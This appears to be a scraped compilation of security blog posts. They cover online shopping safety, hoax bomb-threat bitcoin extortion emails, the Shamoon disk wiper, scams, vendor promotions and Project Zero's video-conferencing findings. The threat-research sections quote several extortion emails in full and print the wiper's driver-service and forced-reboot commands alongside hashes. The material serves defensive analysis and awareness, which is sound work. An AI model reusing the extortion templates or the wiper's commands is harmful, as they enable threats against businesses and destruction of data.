
3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Bogus Bomb Threats Demand Bitcoin Disrupt Businesses

Bogus bomb threats created a scare across the country. A quick note here that I'll dive into more deeply next week. The big question at this time -- with MANY of the IP addresses found in email headers originating from Moscow, Russia, is this "Russian influence" designed to disrupt American commerce? or is this just a spammer looking for a new way to make money?


The more emails we have to analyze, the better our understanding of this threat will be.  While reporting to the FBI's is a great idea, and highly encouraged, that hides the details from security researchers such as myself.  One great place to report any type of fraudulent bitcoin activity is "".  If you decide to report there, please extract the sending IP address and the email Subject from your spam and include them as part of the report.  We can cluster on both of those things. (Including the bitcoin address used is a given.)

Extracts taken from follow below. You can read the original reports yourselves here:

(If you have a sample of one of these emails, please consider filling out a - but please make sure to include the SENDING IP ADDRESS from the email headers!)

Email Bodies contain Spam-template randomization

Here are extracts from many of the spam messages. Note for example the [man | mercenary | recruited person] and [tronitrotoluene | Hexogen | Tetryl] substitutions. Or the [suspicious | unnatural | strange] [activity | behavior] or the [power the device | device will be blown up | power the bomb]. This is very characteristic spam behavior.

Subjects reported by the NCFTA include:

Subject: Better listen to me
Subject: Bomb is in your building
Subject: Do not panic
Subject: Do not waste your time
Subject: Dont get on my nerves
Subject: I advise you not to call the police
Subject: I've collected some very interesting content about you
Subject: keep calm
Subject: My device is inside your building
Subject: Think about how they can help you
Subject: Think twice
Subject: We can make a deal
Subject: You are my victim
Subject: You are responsible for people
Subject: Your building is under my control
Subject: Your life is in your hands
Subject: Your life can be ruined, concentrate
Subject: You're my victim

(If you have examples of other Subjects, please share them in the comments section)

Hello. There is the bomb (tronitrotoluene) in the building where your company is located. It is constructed under my direction. It has small dimensions and it is hidden very carefully, it is not able to damage the supporting building structure, but you will get many wounded people if it detonates. My recruited person is controlling the situation around the building. If he notices any strange activity or policemen the device will be blown up. I want to propose you a deal. $20'000 is the value for your safety. Pay it to me in BTC and I assure that I have to withdraw my recruited person and the bomb will not explode. But do not try to deceive me- my assurance will become actual only after 3 confirms in blockchain. It is my btc address : 15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM

Good day. My mercenary hid an explosive device (Hexogen) in the building where your business is conducted. It was assembled according to my instructions. It is compact and it is hidden very carefully, it is impossible to damage the structure of the building by this bomb, but in case of its explosion you will get many victims.My mercenary is watching the situation around the building. If he notices any suspicious behavior, panic or cops he will blow up the bomb.I want to propose you a bargain. You transfer me 20'000 usd in BTC and the bomb will not explode, but don't try to deceive me -I guarantee you that I have to withdraw my man only after 3 confirmations in blockchain network. It is my Bitcoin address : 1LrZorkdqzPsg8JaGLwjLwg35viiH1Sv9v You must send bitcoins by the end of the working day.

My mercenary has carried an explosive device (Tetryl) into the building where your company is located. It was assembled under my direction. It can be hidden anywhere because of its small size, it is impossible to destroy the building structure by this explosive device, but if it detonates there will be many victims. My recruited person is watching the situation around the building. If he sees any unusual behavior or policemen he will power the device. I would like to propose you a deal. 20.000 dollars is the cost for your life. Tansfer it to me in BTC and I ensure that I will call off my man and the bomb will not explode. But do not try to fool me- my warranty will become valid only after 3 confirms in blockchain network. Here is my BTC address - 15qH84uLC49CmC6jRE958Qjcf9WRZ2rMuM You have to pay me by the end of the working day, if you are late with the payment the device will explode.

Good day. I write you to inform you that my mercenary hid an explosive device (lead azide) in the building where your company is located. My recruited person constructed a bomb under my direction. It can be hidden anywhere because of its small size, it can not damage the supporting building structure, but you will get many victims in case of its explosion. My mercenary keeps the territory under the control. If he notices any unnatural behavior or emergency he will power the bomb. I can call off my man if you make a transfer. 20'000 usd is the price for your safety. Pay it to me in Bitcoin and I guarantee that I will call off my mercenary and the device will not detonate. But do not try to cheat- my assurance will become valid only after 3 confirmations in blockchain.

Good day. There is a bomb (tronitrotoluene) in the building where your company is conducted. My recruited person constructed the explosive device according to my instructions. It can be hidden anywhere because of its small size, it is impossible to destroy the structure of the building by my explosive device, but in case of its explosion you will get many victims. My man keeps the territory under the control. If any unnatural behavior, panic or emergency is noticed the device will be blown up. I can call off my recruited person if you make a transfer. 20'000 usd is the price for your safety. Tansfer it to me in Bitcoin and I ensure that I will withdraw my mercenary and the bomb won't explode. But do not try to deceive me- my warranty will become valid only after 3 confirms in blockchain network. My payment details (Bitcoin address): 1CDs3JXUU6wNmndAF7EFcrJ6GGSYRKXd7w

My man hid a bomb (lead azide) in the building where your business is conducted. It was constructed according to my guide. It is small and it is hidden very well, it is impossible to destroy the supporting building structure by this explosive device, but you will get many victims in the case of its detonation. My mercenary keeps the territory under the control. If any unnatural activityor emergency is noticed the bomb will be blown up. I would like to propose you a deal. You transfer me $20'000 in Bitcoin and explosive will not explode, but do not try to cheat -I warrant you that I will call off my man solely after 3 confirmations in blockchain network.

Hello. There is the bomb (lead azide) in the building where your business is conducted. My man built the explosive device according to my instructions. It is compact and it is hidden very carefully, it is impossible to damage the structure of the building by this explosive device, but if it detonates you will get many victims. I would like to propose you a bargain. 20.000 dollars is the cost for your life. Pay it to me in BTC and I guarantee that I have to call off my man and the device will not explode. But do not try to cheat- my guarantee will become valid only after 3 confirmations in blockchain network.

My man has carried the explosive device (tronitrotoluene) into the building where your business is conducted. My recruited person constructed the bomb according to my guide. It can be hidden anywhere because of its small size, it can not destroy the supporting building structure, but in the case of its detonation there will be many wounded people. My man is controlling the situation around the building. If any unnatural activity, panic or policeman is noticed the device will be blown up.
I write you to inform you that my recruited person carried the explosive device (Tetryl) into the building where your business is located. It is assembled according to my instructions. It can be hidden anywhere because of its small size, it is impossible to destroy the building structure by this bomb, but in case of its explosion there will be many victims. My man is controlling the situation around the building. If he sees any suspicious activity, panic or emergency the device will be exploded. I can withdraw my mercenary if you make a transfer. You transfer me 20.000 dollars in Bitcoin and the device will not detonate, but don't try to fool me -I ensure you that I will withdraw my recruited person only after 3 confirmations in blockchain. Here is my BTC address - 161JE4rHfvygXUVLya8N2WFptjwon2172t

These were EVERYWHERE - NOT targeted

Dozens of law enforcement agencies tweeted about these threats being received in their local area.  If you are aware of such "official" tweets, please leave a link to the Twitter Status report in the comments section below. 

Even AFTER it was well known that these were hoaxes, many law enforcement agencies continued to respond with full bomb squad roll-outs.  Given the history in Oklahoma City, this was especially understandable there, but wasted a tremendous amount of resources as they responded to AT LEAST thirteen threats just in that city!

Here are a few examples, and then a longer list in Table form:
Each entry in the table below is an "official" Tweet indicating local law enforcement responded to a bomb threat in that area.  If your local is not listed, please search for "official" notices for your area and share them in our comments section.  Thanks!

Calgary, Alberta, CA
Calgary, Alberta, CA
Winnipeg, Manitoba, CA
London, Ontario, CA
Toronto, Ontario, CA
Anniston, Alabama
Pelham, Alabama
Anchorage, Alaska
Phoenix, Arizona
Bakerfield, California
Chico, California
Chino, California
Garden Grove, California
Los Angeles, California
San Francisco, California
San Francisco, California
Santa Rosa, California
Ottawa, Canada
Aurora, Colorado
Fort Collins, Colorado
Danbury, Connecticut
Wallingford, Connecticut
Ocala, Florida
Sanford, Florida
Tampa, Florida
Atlanta, Georgia
Dekalb County, Georgia
Valdosta, Georgia
Honolulu, Hawaii
Chicago, Illinois
Chicago, Illinois
Indianapolis, Indiana
Cedar Rapids, Iowa
Wichita, Kansas
Wichita, Kansas
Lexington, Kentucky
Portland, Maine
Frederick, Maryland
Salisbury, Maryland
Boston, Massachusetts
Salisbury, Massachusetts
Massachusetts State Police
Detroit, Michigan
Grand Blanc, Michigan
Grand Rapids, Michigan
Long Beach, Mississippi
Raleigh, NC
Lincoln, Nebraska
Lincoln, Nebraska
Omaha, Nebraska
Linden, New Jersey
Buffalo, New York
Buffalo, New York
Buffalo, New York
New York, New York
Niagara Falls, New York
Rochester, New York
Boone, North Carolina
Boone, North Carolina
UNC Raleigh, North Carolina
Cleveland, Ohio
Columbus, Ohio
Bexley, Ohio (Capital University)
Oklahoma City, Oklahoma
Oklahoma City, Oklahoma
Tulsa, Oklahoma
Erie, Pennsylvania
Lancaster, Pennsylvania
Memphis, Tennessee
Beaumont, Texas
El Paso, Texas
Fricso, Texas
Houston, Texas
Lubbock, Texas
Rosenberg, Texas
St. George, Utah
St. George, Utah
Chesterfield County, Virginia
Hampton Roads, Virginia
Bellevue, Washington
Massachusetts States Police
Michigan State Police
Michigan State Police
Notre Dame University
Washington DC

How to protect Windows 10 PCs from ransomware

CryptoLocker. WannaCry. Petya. Bad Rabbit. The ransomware threat isn’t going away anytime soon; the news brings constant reports of new waves of this pernicious type of malware washing across the world. It’s popular in large part because of the immediate financial payoff for attackers: It works by encrypting the files on your hard disk, then demands that you pay a ransom, frequently in Bitcoins, to decrypt them.

But you needn’t be a victim. There’s plenty that Windows 10 users can do to protect themselves against it. In this article, I’ll show you how to keep yourself safe, including how to use an anti-ransomware tool built into Windows 10.

To read this article in full, please click here

(Insider Story)

Shamoon Returns to Wipe Systems in Middle East, Europe

Destructive malware has been employed by adversaries for years. Usually such attacks are carefully targeted and can be motivated by ideology, politics, or even financial aims.

Destructive attacks have a critical impact on businesses, causing the loss of data or crippling business operations. When a company is impacted, the damage can be significant. Restoration can take weeks or months, while resulting in unprofitability and diminished reputation.

Recent attacks have demonstrated how big the damage can be. Last year NotPetya affected several companies around the world. Last February, researchers uncovered OlympicDestroyer, which affected the Olympic Games organization.

Shamoon is destructive malware that McAfee has been monitoring since its appearance. The most recent wave struck early this month when the McAfee Foundstone Emergency Incident Response team reacted to a customer’s breach and identified the latest variant. Shamoon hit oil and gas companies in the Middle East in 2012 and resurfaced in 2016 targeting the same industry. This threat is critical for businesses; we recommend taking appropriate actions to defend your organizations.

During the past week, we have observed a new variant attacking several sectors, including oil, gas, energy, telecom, and government organizations in the Middle East and southern Europe.

Similar to the previous wave, Shamoon Version 3 uses several mechanisms as evasion techniques to bypass security as well to circumvent analysis and achieve its ends. However, its overall behavior remains the same as in previous versions, rendering detection straightforward for most antimalware engines.

As in previous variants, Shamoon Version 3 installs a malicious service that runs the wiper component. Once the wiper is running, it overwrites all files with random rubbish and triggers a reboot, resulting in a “blue screen of death” or a driver error and making the system inoperable. The variant can also enumerate the local network, but in this case does nothing with that information. This variant has some bugs, suggesting the possibility that this version is a beta or test phase.

The main differences from earlier versions are the name list used to drop the malicious file and the fabricated service name MaintenaceSrv (with “maintenance” misspelled). The wiping component has also been designed to target all files on the system with these options:

  • Overwrite file with garbage data (used in this version and the samples we analyzed)
  • Overwrite with a file (used in Shamoon Versions 1 and 2)
  • Encrypt the files and master boot record (not used in this version)

Shamoon is modular malware: The wiper component can be reused as a standalone file and weaponized in other attacks, making this threat a high risk. The post presents our findings, including a detailed analysis and indicators of compromise.


Shamoon is a dropper that carries three resources. The dropper is responsible for collecting data as well as embedding evasion techniques such as obfuscation, antidebugging, or antiforensic tricks. The dropper requires an argument to run.

It decrypts the three resources and installs them on the system in the %System% folder. It also creates the service MaintenaceSrv, which runs the wiper. The typo in the service name eases detection.

The Advanced Threat Research team has watched this service evolve over the years. The following tables highlight the differences:

The wiper uses ElRawDisk.sys to access the user’s raw disk and overwrites all data in all folders and disk sectors, causing a critical state of the infected machine before it finally reboots.

The result is either a blue screen or driver error that renders the machine unusable.



Executable summary

The dropper contains other malicious components masked as encrypted files embedded in PE section.

These resources are decrypted by the dropper and contain:

  • MNU: The communication module
  • LNG: The wiper component
  • PIC: The 64-bit version of the dropper

Shamoon 2018 needs an argument to run and infect machines. It decrypts several strings in memory that gather information on the system and determine whether to drop the 32-bit or 64-bit version.

It also drops the file (MD5: 41f8cd9ac3fb6b1771177e5770537518) in the folder c:\Windows\Temp\

The malware decrypts two files used later:

  • C:\Windows\inf\mdmnis5tQ1.pnf
  • C:\Windows\inf\averbh_noav.pnf

Shamoon enables the service RemoteRegistry, which allows a program to remotely modify the registry. It also disables remote user account control by enabling the registry key LocalAccountTokenFilterPolicy.

The malware checks whether the following shares exist to copy itself and spread:

  • ADMIN$

Shamoon queries the service to retrieve specific information related to the LocalService account.

It then retrieves the resources within the PE file to drop the components. Finding the location of the resource:

Shamoon creates the file and sets the time to August 2012 as an antiforensic trick. It puts this date on any file it can destroy.

The modification time can be used as an antiforensic trick to bypass detection based on the timeline, for example. We also observed that in some cases the date is briefly modified on the system, faking the date of each file. The files dropped on the system are stored in C:\\Windows\System32\.

Before creating the malicious service, Shamoon elevates its privilege by impersonating the token. It first uses LogonUser and ImpersonateLoggedOnUser, then ImpersonateNamedPipeClient. Metasploit uses a similar technique to elevate privileges.

Elevating privileges is critical for malware to perform additional system modifications, which are usually restricted.

Shamoon creates the new malicious service MaintenaceSrv. It creates the service with the option Autostart (StartType: 2) and runs the service with its own process (ServiceType: 0x10):

If the service is already created, it changes the configuration parameter of the service with the previous configuration.

It finally finishes creating MaintenaceSrv:

The wiper dropped on the system can have any one of the following names:



Next the wiper runs to destroy the data.


The wiper component is dropped into the System32 folder. It takes one parameter to run. The wiper driver is embedded in its resources.

We can see the encrypted resources, 101, in this screenshot:

The resource decrypted is the driver ElRawDisk.sys, which wipes the disk.

Extracting the resource:

This preceding file is not malicious but is considered risky because it is the original driver.

The wiper creates a service to run the driver with the following command:

sc create hdv_725x type= kernel start= demand binpath= WINDOWS\hdv_725x.sys 2>&1 >nul


The following screenshot shows the execution of this command:


The malware overwrites every file in c:\Windows\System32, placing the machine in a critical state. All the files on the system are overwritten.

The overwriting process:

Finally, it forces the reboot with the following command:

Shutdown -r -f -t 2


Once the system is rebooted it shows a blue screen:


The worm component is extracted from the resources from the dropper. Destructive malware usually uses spreading techniques to infect machines as quickly as possible.

The worm component can take the following names:

We noticed the capability to scan for the local network and connect to a potential control server:

Although the worm component can spread the dropper and connect to a remote server, the component was not used in this version.


Aside from the major destruction this malware can cause, the wiper component can be used independently from the dropper. The wiper does not have to rely on the main stub process. The 2018 Shamoon variant’s functionality indicates modular development. This enables the wiper to be used by malware droppers other than Shamoon.

Shamoon is showing signs of evolution; however, these advancements did not escape detection by McAfee DATs. We expect to see additional attacks in the Middle East (and beyond) by these adversaries. We will continue to monitor our telemetry and will update this analysis as we learn more.

MITRE ATT&CK™ matrix

Indicators of compromise

df177772518a8fcedbbc805ceed8daecc0f42fed                    Original dropper x86
ceb7876c01c75673699c74ff7fac64a5ca0e67a1                    Wiper
10411f07640edcaa6104f078af09e2543aa0ca07                   Worm module
bf3e0bc893859563811e9a481fde84fe7ecd0684                  RawDisk driver


McAfee detection

  • Trojan-Wiper!DE07C4AC94A5
  • RDN/Generic.dx
  • Trojan-Wiper

The post Shamoon Returns to Wipe Systems in Middle East, Europe appeared first on McAfee Blogs.

Chinese hackers reportedly hit Navy contractors with multiple attacks

Chinese hackers have been targeting US Navy contractors, and were reportedly successful on several occasions over the last 18 months. The infiltrators stole information including missile plans and ship maintenance data, according to a Wall Street Journal report that cites officials and security experts.

Source: Wall Street Journal

Why I Bring My Authentic Self to Work at McAfee

By Kristol, Sales Account Manager and President, McAfee African Heritage Community

If you talked to me when I first started working at McAfee, I wouldn’t have believed you if you told me that I’d still be working here 16 years later. But I am still working here, and I’ve grown from every challenge and success in my cybersecurity journey. Most of all, I’m thankful to work for an employee-first company.

When I walk through our Plano office doors, it’s like walking into my second home. At my desk, I even have my own as-seen-on-TV “Snuggie” blanket in case I get cold while I’m working.

Early in my career at McAfee, I formed an immediate bond with my new teammates in operations. It was clear to me that they would soon become family. Over the years, we have shared milestones, marriages, births, and burials. And as I’ve moved role to role internally at McAfee, I’ve noticed a trend: these wonderful working relationships have continued. My experience has remained consistent as I’ve moved between departments: from operations to finance and sales.

During my tenure, I have experienced a transition from a married woman with a five-year-old daughter and three-year-old son, to a divorcée who is approaching an “empty nesting” season of life. My transition has brought challenging personal experiences—and McAfee was the only constant in my life. Work/life balance as a single mother was critical to my personal and professional success. McAfee’s leadership approach has always been sensitive—not only to what’s best for the bottom line, but what’s best for the employee.


Culture and Office Camaraderie

One of my favorite parts about working at McAfee is the fun culture! In the last 16 years, I have had seven different roles—each with new challenges and skillsets to prepare me for the next level. It has been one adventurous ride—from recording a sales kick-off video meeting, to dress-up shenanigans, to singing “Proud Mary” at a Christmas event (and winning!).

10 years ago, I started a Holiday Candle Exchange party with the women here in our Plano office.  My goal was to put names to faces, network with other women at McAfee and of course, get a great candle for the season! The event started with four to six women and has grown to over 20 women annually. This is one of McAfee’s best attributes, the ability to innovate without fear and cultivate an inclusive culture—right where you are!

Becoming a Leader in the African Heritage Community

In 2017, I proudly accepted the appointment to become the President of the African Heritage Community, one of our diversity and inclusion chapters at McAfee. It’s been an honor to be a part of an organization that celebrates diversity while fostering inclusion and professional growth. The MAHC chapter is led by talented individuals from different business units across the company—like human resources, training, support, and operations.

Our organization is focused on staying connected, cultivating our organization, and committed to professional and personal growth—while centering ourselves within the community.

How McAfee Has Supported My Development

I have truly been blessed to be an employee at McAfee. I work with teammates, managers, and executives that push me to be a better version of myself every single day. They challenge my way of thinking and motivate me to look beyond the present. To prepare for unknown surprises. To accept defeat and learn from it. To be confident in my decisions and trust myself. To never stop learning, believing and dreaming!

This is my life at McAfee…and it’s a wonderful life!



For more stories like this, follow @LifeAtMcAfee on Instagram and on Twitter @McAfee to see what working at McAfee is all about. Interested in joining our teams? We’re hiring! Apply now!

The post Why I Bring My Authentic Self to Work at McAfee appeared first on McAfee Blogs.

Point of View Matters

Just a quick thought this morning as I'm reading the news on the attack against Italian oil services firm Saipem across Twitter and other news outlets. It struck me fairly quickly that much of what my security industry peers read is very one-sided, and perspective matters.

Allow me to illustrate.

This article shows up on most of the business wires, it's from Reuters:
It's short and gets to the point quickly.

  • the attack on the firm will have no impact on the group's revenues
  • a cyber attack crippled over 300 computers and servers in the middle east
Short. To the point. Leads with the big story first (no revenue impact).

This article was retweeted a bunch on the Twitter hacker and information security feeds:
It paints a different story.
  • uses words like "notorious", and highlights an outage
  • it focuses on the negative impact (technologically) of the attack
  • likens to Saudi Aramco attack, and "one of the most destructive cyberattacks in history"

Saipem's own website, has this to say: and is much more frank and simple in explanation.

Now, let's get perspective.

Corporate leadership likely reads the short version, on Reuters, which basically says "No financial impact, some computers got broken, move on." On the security side, we see a different, more in-depth (obviously) story develop. Now when you go to your CEO or CFO and say "We need to do more to protect ourselves so we're not the next Saipem" your CFO/CEO will likely look back at you and ask why. There was no revenue impact, the risk seems to have been appropriately handled.

Think about this, as you look at security risks to your organization.

Risky Biz Soap Box: From 2 billion events to 350 alerts with Respond Software

Soap Box is the podcast series we do here at Risky.Biz where we have detailed discussions with vendors about all sorts of stuff – sometimes it’s about their products, other times it’s about the landscape as they see it, other times it’s about research they’ve done that they want to promote. Soap Box is a wholly sponsored podcast series – just so you know – so everyone you hear on it, paid to be on it.

And this Soap Box edition is brought to you by Respond Software. We’ll be joined by Respond Software’s co-founder and CEO, Mike Armistead to talk about Respond’s tech. Mike has an interesting history in infosec… he actually co-founded Fortify, the software security firm, before winding up at HPE as the VP and General Manager for Arcsight, the poor fella. But he’s free now! Freeeeeee! And he’s co-founded the venture we’re talking about today.

So, what’s the idea behind Respond Software? Well, to break it down into really simple terms the whole idea is to take all the zillions of events your existing security kit flags and distill them down into meaningful alerts. To put this into context, Mike says that during the 30 days in the lead up to the interview we recorded, his customers fed two billion events into their Respond Software gear. Of those two billion events, Respond deemed 7 million of them worthy of escalation, and from there determined 45,000 were malicious, but then… and this is the cool part, this only resulted in 350 incidents raised by the Respond platform. From 2 billion to 350.

So it’s a great idea – tune out the crap and look at meaningful correlations. Automate the decision making around what’s serious and what’s not. You’ve got all this gear, maybe you’ve got something aggregating it, but what’s applying decision logic to it?

Mike sent me a list of software Respond currently supports: all manner of IDSes, AV and EDR suites and then other stuff that gives their software the context it needs to make better decisions, like active directory, Nessus, Qualys, Splunk, QRadar… whatever! The idea is, plug ALL your over-alerting crap into Respond Software’s gear and it’ll do a good enough job of correlating events that you’ll only have to deal with what’s real. Well, that’s the pitch. Mike Armistead joined me to to flesh it out a bit more.

Playbook Fridays: Github Activity Monitor

This Playbook is designed to automate the monitoring and alerting of Github activity for a given user

ThreatConnect developed the Playbooks capability to help analysts automate time consuming and repetitive tasks so they can focus on what is most important. And in many cases, to ensure the analysis process can occur consistently and in real time, without human intervention.

Many malicious actors, from unsophisticated defacers to sophisticated actors, use Github to develop and/or serve malicious content. This is largely because Github offers version control  and Github Pages for automatically deploying content.

With so much diverse, malicious activity on Github, it is important to be able to track the changes on a malicious code repository. This Playbook is designed to automate the monitoring and alerting of Github activity for a given user. In this way, you can get alerts whenever a github user does a public action.

This Playbook is based on the Page Monitor.pbx Playbook described here: . It is designed to be run once a week and uses Github’s public API to check if there is any new activity. If there is new content, it sends an alert (in this case via slack).

Installing the Playbook

To install the Playbook, download the Github Activity Monitor.pbx Playbook and install it in ThreatConnect from the Playbooks page. Once it is installed, start by editing the “Set Variables” app (the Playbook app right after the trigger). You will need to provide the “slackChannel” variable to which messages will be sent and the “githubUserName” variable you would like to monitor. Now, there are a few other apps which need some credentials and other information. The best way to find which apps still need updated is to try to turn the Playbook on which will provide you a list of apps that still need modified. Among the apps that need edited are the slack apps and the datastore apps.

But what if you don’t use Slack? Easy: the Slack apps can be replaced with an app to send an email, create a task in ThreatConnect, or create a Jira issue (among other options). If you have any questions or run into any problems with anything mentioned in this blog, please raise an issue in Github! If you would like to have your app or playbook featured in a Playbook Friday blog post, submit it to our Playbook repository (there are instructions here:







The post Playbook Fridays: Github Activity Monitor appeared first on ThreatConnect | Intelligence-Driven Security Operations.

Insurance Companies Say NotPetya Means War (And Therefore No Coverage)

Add cyberwar to the long list of reasons for why insurance companies will deny claims Essentially, Zurich’s position is that NotPetya was a “hostile or warlike action” by a “government or sovereign power.” In fact, NotPetya is widely viewed as a state-sponsored Russian cyber attack masquerading as ransomware that was designed to target Ukraine but … Continue reading Insurance Companies Say NotPetya Means War (And Therefore No Coverage)

McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals

The Cyber Security Gurukul Series is an initiative by the ‘Women Wizards Rule Tech (W2RT)’, a unique program designed exclusively for Women professionals in Core Technologies by noted industry body NASSCOM. Focused specifically on the IT-ITES/BPM, Product and R&D Firms, the key aim of this initiative is to enable women with deeper knowledge various technologies and thereby nurture them as leaders for tomorrow. It is an initiative McAfee is proud to partake in, which is why on December 4th, McAfee India hosted close to 40 female professionals from many organizations, including McAfee, as a part of NASSCOM’s Cybersecurity Gurukul series.

The half a day session started with a keynote from Venkat Krishnapur, VP Engineering & Managing Director, McAfee India. Addressing the group on “Countering Emerging Threats by Building Security DNA of your Organization”, the session discussed how the exponential growth of connected devices over the past few years has made organizations and individuals prone to cyberattacks more than ever before. Venkat also covered other key topics, such as the increase in the number of cyberattacks, variety and evolution of malware, importance of cloud security in today’s day and age, and how security organizations such as McAfee invest in both technology and people

Following Venkat’s keynote session, Sandeep Kumar Singh, Security Researcher and SSA Lead, McAfee India, hosted a two-hour session for the attendees. The session touched upon various facets of “Introduction to Security Deployment Lifecycle” why it’s imperative for organizations to invest in SDL, the key ingredients of a successful security program, and a walkthrough of key SDL activities. Sandeep also spoke to the group about how choosing a career in cybersecurity will give them a competitive edge, as a shortage of professionals in this field remains a critical vulnerability for organizations and nations alike.

Overall, the event was quite the hit with attendees – as proven by demos, quizzes, and an interactive Q&A session. Sharing their feedback on the event , one of the participants said:

“The Cyber Security session which I attended today at McAfee India will go a long way in helping us enhance our knowledge and skills. The presentation given by Sandeep was excellent and the slides prepared by him were crisp and clear. We’d like to thank NASSCOM for arranging these sessions and we are looking for more such classroom sessions coming on our way.”

Sessions and programs such as these will go a long way in ensuring that organizations are helping pave way for women to enhance their skills, as well as give them an edge in their career development. McAfee is proud to play a role in influencing the overall India/APAC digital security ecosystem through it’s thought leadership.

The post McAfee India Hosts NASSCOM’s ‘Cyber Security Gurukul’ – An Exclusive Initiative for Women Professionals appeared first on McAfee Blogs.

How to Stay Secure from the Latest Volkswagen Giveaway Scam

You’re scrolling through Facebook and receive a message notification. You open it and see it’s from Volkswagen, claiming that the company will be giving away 20 free vehicles before the end of the year. If you think you’re about to win a new car, think again. This is likely a fake Volkswagen phishing scam, which has been circulating social media channels like WhatsApp and Facebook, enticing hopeful users looking to acquire a new ride.

This fake Volkswagen campaign works differently than your typical phishing scam. The targeted user receives the message via WhatsApp or Facebook and is prompted to click on the link to participate in the contest. But instead of attempting to collect personal or financial information, the link simply redirects the victim to what appears to be a standard campaign site in Portuguese. When the victim clicks the buttons on the website, they are redirected to a third-party advertising site asking them to share the contest link with 20 of their friends. The scam authors, under the guise of being associated with Volkswagen, promise to contact the victims via Facebook once this task is completed.

As of now, we haven’t seen indicators that participants have been infected by malicious software or had any personal information stolen as a result of this scam. But because the campaign link redirects users to ad servers, the scam authors are able to maximize revenue for the advertising network. This encourages malicious third-party advertisers to continue these schemes in order to make a profit.

The holidays in particular are a convenient time for cybercriminals to create more scams like this one, as users look to social media for online shopping inspiration. Because schemes such as this could potentially be profitable for cybercriminals, it is unlikely that phishing scams spread via social media will let up. Luckily, we’ve outlined the following tips to help dodge fake online giveaways:

  • Avoid interacting with suspicious messages. If you receive a message from a company asking you to enter a contest or share a certain link, it is safe to assume that the sender is not from the actual company. Err on the side of caution and don’t respond to the message. If you want to see if a company is actually having a sale, it is best to just go directly to their official site to get more information.
  • Be careful what you click on. If you receive a message in an unfamiliar language, one that contains typos, or one that makes claims that seem too good to be true, avoid clicking on any attached links.
  • Stay secure while you browse online. Security solutions like McAfee WebAdvisor can help safeguard you from malware and warn you of phishing attempts so you can connect with confidence.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post How to Stay Secure from the Latest Volkswagen Giveaway Scam appeared first on McAfee Blogs.

Adventures in Video Conferencing Part 5: Where Do We Go from Here?

Posted by Natalie Silvanovich, Project Zero

Overall, our video conferencing research found a total of 11 bugs in WebRTC, FaceTime and WhatsApp. The majority of these were found through less than 15 minutes of mutation fuzzing RTP. We were surprised to find remote bugs so easily in code that is so widely distributed. There are several properties of video conferencing that likely led to the frequency and shallowness of these issues.

WebRTC Bug Reporting

When we started looking at WebRTC, we were surprised to discover that their website did not describe how to report vulnerabilities to the project. They had an open bug tracker, but no specific guidance on how to flag or report vulnerabilities. They also provided no security guidance for integrators, and there was no clear way for integrators to determine when they needed to update their source for security fixes. Many integrators seem to have branched WebRTC without consideration for applying security updates. The combination of these factors make it more likely that vulnerabilities did not get reported, vulnerabilities or fixes got ‘lost’ in the tracker, fixes regressed or fixes did not get applied to implementations that use the source in part.

We worked with the WebRTC team to add this guidance to the site, and to clarify their vulnerability reporting process. Despite these changes, several large software vendors reached out to our team with questions about how to fix the vulnerabilities we reported. This shows there is still a lack of clarity on how to fix vulnerabilities in WebRTC.

Video Conferencing Test Tools

We also discovered that most video conferencing solutions lack adequate test tools. In most implementations, there is no way to collect data that allows for problems with an RTP stream to be diagnosed. The vendors we asked did not have such a tool, even internally.  WebRTC had a mostly complete tool that allows streams to be recorded in the browser and replayed, but it did not work with streams that used non-default settings. This tool has now been updated to collect enough data to be able to replay any stream. The lack of tooling available to test RTP implementations likely contributed to the ease of finding vulnerabilities, and certainly made reproducing and reporting vulnerabilities more difficult

Video Conferencing Standards

The standards that comprise video conferencing such as RTP, RTCP and FEC introduce a lot of complexity in achieving their goal of enabling reliable audio and video streams across any type of connection. While the majority of this complexity provides value to the end user, it also means that it is inherently difficult to implement securely.

The Scope of Video Conferencing

WebRTC has billions of users. While it was originally created for use in the Chrome browser, it is now integrated by at least two Android applications that eclipse Chrome in terms of users: Facebook and WhatsApp (which only uses part of WebRTC). It is also used by Firefox and Safari. It is likely that most mobile devices run multiple copies of the WebRTC library. The ubiquity of WebRTC coupled with the lack of a clear patch strategy make it an especially concerning target for attackers.

Recommendations for Developers

This section contains recommendations for developers who are implementing video conferencing based on our observations from this research.

First, it is a good idea to use an existing solution for video conferencing (either WebRTC or PJSIP) as opposed to implementing a new one. Video conferencing is very complex, and every implementation we looked at had vulnerabilities, so it is unlikely a new implementation would avoid these problems. Existing solutions have undergone at least some security testing and would likely have fewer problems.

It is also advisable to avoid branching existing video conferencing code. We have received questions from vendors who have branched WebRTC, and it is clear that this makes patching vulnerabilities more difficult. While branching can solve problems in the short term, integrators often regret it in the long term.

It is important to have a patch strategy when implementing video conferencing, as there will inevitably be vulnerabilities found in any implementation that is used. Developers should understand how security patches are distributed for any third-party library they integrate, and have a plan for applying them as soon as they are available.

It is also important to have adequate test tools for a video conferencing application, even if a third-party implementation is used. It is a good idea to have a way to reproduce a call from end to end. This is useful in diagnosing crashes, which could have a security impact, as well as functional problems.

